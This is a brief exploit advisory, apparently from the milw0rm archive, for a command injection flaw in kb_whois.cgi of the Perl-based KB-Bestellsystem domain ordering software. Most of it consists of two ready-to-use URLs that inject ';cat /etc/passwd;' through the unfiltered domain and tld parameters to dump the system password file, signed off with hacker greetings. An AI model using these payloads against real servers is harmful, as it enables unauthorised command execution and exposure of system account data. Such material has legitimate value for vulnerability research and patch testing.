KB-Bestellsystem (kb_whois.cgi) Command Execution Vulnerability`KB-Bestellsystem` is a domain order system written in Perl.
The `domain` and `tld` parameters in `kb_whois.cgi` are not filtering shell metacharacters.

The following examples will show you the /etc/passwd file:

http://targethost.com/kb-bestellsystem/kb_whois.cgi?action=check_owner&domain=;cat%20/etc/passwd;&tld=.com&tarrif=
http://targethost.com/kb-bestellsystem/kb_whois.cgi?action=check_owner&domain=google&tld=.com;cat /etc/passwd;&tarrif=

<< Greetz Zero X >>

# milw0rm.com [2007-11-22]